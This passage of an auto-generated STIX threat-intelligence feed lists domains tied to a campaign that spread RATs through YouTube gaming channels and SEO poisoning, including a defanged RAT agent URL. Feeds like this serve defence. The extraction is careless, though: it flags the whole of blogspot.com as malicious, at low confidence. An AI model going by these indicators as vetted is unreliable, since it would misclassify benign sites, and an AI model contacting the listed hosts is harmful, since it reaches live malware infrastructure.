News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23ac2425-4670-427d-8a3e-10765605a426","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: airtwig.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[","pattern":"[domain-name:value = 'airtwig.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbc4c42e-98b2-4fd4-999c-1c2c7e8d17c9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: amazingshield.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL","pattern":"[domain-name:value = 'amazingshield.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f30f49f-72ac-407c-9f1b-10765c747a99","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: amountfuel.icu","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g","pattern":"[domain-name:value = 'amountfuel.icu']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--11b4119e-192a-4328-9e7c-b988473c19d4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: animalrecord.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra","pattern":"[domain-name:value = 'animalrecord.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--036193d0-6900-4263-8981-1d88bb98e0dc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: animalview.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.","pattern":"[domain-name:value = 'animalview.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bb8323af-550c-44f7-95bf-27549d43480c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: apparatustaste.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ;","pattern":"[domain-name:value = 'apparatustaste.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8afac0e9-706b-4135-91e3-7374ef6af39e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: apparatustruck.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare","pattern":"[domain-name:value = 'apparatustruck.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3398aa80-b802-404b-b02f-4d495f3bdd02","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: apparelplate.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[","pattern":"[domain-name:value = 'apparelplate.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd19543c-c59b-414e-ae1c-0426c9a425a8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: archairport.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]","pattern":"[domain-name:value = 'archairport.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c1d9e69-9fd7-4de9-a827-b386b0fc8a9d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: armcard.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz","pattern":"[domain-name:value = 'armcard.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2e81f53-b065-4189-afcc-7dee72660c47","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: atthelake.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[","pattern":"[domain-name:value = 'atthelake.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60098482-ccb1-4a3d-b115-c63b93a70030","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: authoritykittens.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba","pattern":"[domain-name:value = 'authoritykittens.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f1d21cb-30d1-45e8-83b2-096a8b1c14d0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: babyvein.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz","pattern":"[domain-name:value = 'babyvein.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6467b979-40cf-4afc-ab01-6d17ce26acc2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: badgeterritory.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con","pattern":"[domain-name:value = 'badgeterritory.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--448edf88-6ac3-4897-ab9b-1bacffdaedfe","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: badgewing.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[","pattern":"[domain-name:value = 'badgewing.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a44f7b0c-ad52-4db1-9d28-07ad806e004c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bagcare.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo","pattern":"[domain-name:value = 'bagcare.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1db760b6-81a9-4a0d-9771-823d2d300cee","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: baitmetal.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz","pattern":"[domain-name:value = 'baitmetal.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--daa7b0ea-05fa-4cb9-b37b-dd1c539dd736","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: basesfile.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor","pattern":"[domain-name:value = 'basesfile.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4898b232-8721-403b-a24d-34f0012b1615","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: basesfiles.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace","pattern":"[domain-name:value = 'basesfiles.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1bbc46d-9b58-409f-9f89-a8dfd3c2d495","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: basinpleasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir","pattern":"[domain-name:value = 'basinpleasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--56c67517-6ca4-4532-b85e-98dc1900ede5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: basketballyear.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture","pattern":"[domain-name:value = 'basketballyear.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34a2fb98-86a7-4389-b1d4-ddc71a503156","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: baskethumor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro","pattern":"[domain-name:value = 'baskethumor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b846e44-0d7b-462d-9f16-a1228e901035","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bedroomdesire.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke","pattern":"[domain-name:value = 'bedroomdesire.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6903752b-8d54-440f-9951-f0c9cbfb88e7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: beefteeth.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy","pattern":"[domain-name:value = 'beefteeth.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--74c4dca6-8c19-4eaa-ba0e-8b7f1259ebf3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: beliefpicture.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag","pattern":"[domain-name:value = 'beliefpicture.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--744663e6-a0f1-40ef-892a-73d0e920c9a9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: believesisters.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x","pattern":"[domain-name:value = 'believesisters.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52f4066f-bee5-4f14-81bf-0773aa908b65","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bellplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[","pattern":"[domain-name:value = 'bellplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cfb4e69f-890b-4f76-bb9e-e5cda52b2185","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bikesdonkey.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick","pattern":"[domain-name:value = 'bikesdonkey.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81892212-6b9f-4b93-8391-f6b85c2aed50","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: birthdaymagic.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]","pattern":"[domain-name:value = 'birthdaymagic.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b66a476-b75a-403b-8c6d-902b6cf410c8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: blogspot.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx","pattern":"[domain-name:value = 'blogspot.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f395da68-5cec-4106-9fab-e403c35a09f7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: boardmagic.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in","pattern":"[domain-name:value = 'boardmagic.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--400c06d0-28e4-4ec5-9eb8-e03cfcf9bca3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: boatthought.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[","pattern":"[domain-name:value = 'boatthought.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b5f0c31-4a76-49f3-bf30-4d30bad9b118","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: boundarychickens.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy","pattern":"[domain-name:value = 'boundarychickens.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8af8db20-798a-4215-ad65-1525c1ae1902","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: boundaryfly.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz","pattern":"[domain-name:value = 'boundaryfly.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4f3dde6-38d4-4181-9c91-5c0c997e682d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: boytank.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; 